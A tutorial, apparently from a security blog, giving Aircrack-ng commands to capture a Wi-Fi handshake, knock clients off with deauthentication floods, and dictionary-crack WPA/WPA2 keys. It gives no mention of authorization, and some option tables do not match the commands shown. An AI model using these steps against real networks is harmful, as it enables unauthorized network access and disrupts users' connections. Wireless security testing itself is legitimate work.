Cybertek Defense

Obtain WPA/WPA2 Wi-Fi Passwords With Aircrack-ng

Aircrack-ng is a complete suite of tools to assess WiFi network security.

All tools are command line which allows for heavy scripting. A lot of GUIs have taken advantage of this feature. It works primarily Linux but also Windows, OS X, FreeBSD, OpenBSD, NetBSD, as well as Solaris and even eComStation 2.

It focuses on different areas of WiFi security:

You can find more information and any downloads on their main website https://www.aircrack-ng.org

Requirements

Process

Open a terminal and provide super user credentials

sudo su

verify the interface of your wireless card

airmon-ng

Kill active processes that could cause trouble with aircrack-ng

airmon-ng check kill

Put your wireless card into monitor mode. After doing so, you will need to type wlan0mon going forward.

airmon-ng start wlan0

Capture the packets of all surrounding networks and endpoint machines. You do not have to keep running the command once you have found the network and machines you are trying to obtain.

airodump-ng wlan0mon
BSSIDThe MAC address of the AP
RXQQuality of the signal, when locked on a channel
PWRSignal strength. Some drivers don’t report it
BeaconsNumber of beacon frames received. If you don’t have a signal strength you can estimate it by the number of beacons: the more beacons, the better the signal quality
DataNumber of data frames received
CHChannel the AP is operating on
MBSpeed or AP Mode. 11 is pure 802.11b, 54 pure 802.11g. Values between are a mixture
ENCEncryption: OPN: no encryption, WEP: WEP encryption, WPA: WPA or WPA2 encryption, WEP?: WEP or WPA (don’t know yet)
ESSIDThe network name. Sometimes hidden

Once you have determined the network you are trying to obtain, you can collect the authentication handshake for the network.

airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w AA:BB:CC:DD:EE:FF wlan0mon --ignore-negative-one
OptionDescription
-cThe channel for the wireless network
--bssidThe MAC address of the access point
-wThe file name prefix for the file which will contain authentication handshake
mon0The wireless interface
--ignore-negative-oneFixes the ‘fixed channel : -1’ error message

If you have waited a few minutes and have not received a handshake or any information, we can force a de-authentication of the entire network or for a specific device within the network. You do not have to do both as mentioned below. I would suggest starting with the first option and then use the second option if the first one does not work. Make sure to open a new terminal window to run either of these commands. We need to make sure the airodump-ng command from the previous step continues to run.

aireplay-ng --deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon --ignore-negative-one
aireplay-ng --deauth 100 -a 00:11:22:33:44:55 wlan0mon --ignore-negative-one
OptionDescription
--deauth 100The number of de-authenticate frames you want to send (0 for unlimited)
-aThe MAC address of the access point
-cThe MAC address of the client
mon0The wireless interface
--ignore-negative-oneFixes the ‘fixed channel : -1’ error message

Once the handshake has been obtained, you can press Ctrl + C to cancel the commands. The handshake will be saved under the /home/”username”/ folder, you should see a few files, we need the file extension ending with .cap.

We will also need the location of the wordlist you are going to use to reference the hash from the handshake. Kali does provide a small wordlist found in /usr/share/wordlists folder called “rockyou.txt.gz“. You will need to extract the file using gunzip.

If you do not have your own wordlist, you can uzip the rockyou.txt.gz file

cd /usr/share/wordlists
gunzip rockyou.txt.gz

You should now see the rockyou.txt file in the wordlists folder as mentioned above.

Crack the WPA/WPA2-PSK with the following command

aircrack-ng -w rockyou.txt -b 00:11:22:33:44:55 WPAcrack.cap
OptionDescription
-wThe name of the dictionary file
-bThe MAC address of the access point
Netgear.capThe name of the file that contains the authentication handshake

Depending on the size of the wordlist and the processing power of your computer, time will vary. Once the key is found, the key will be listed within the “Key Found” field.

Exit mobile version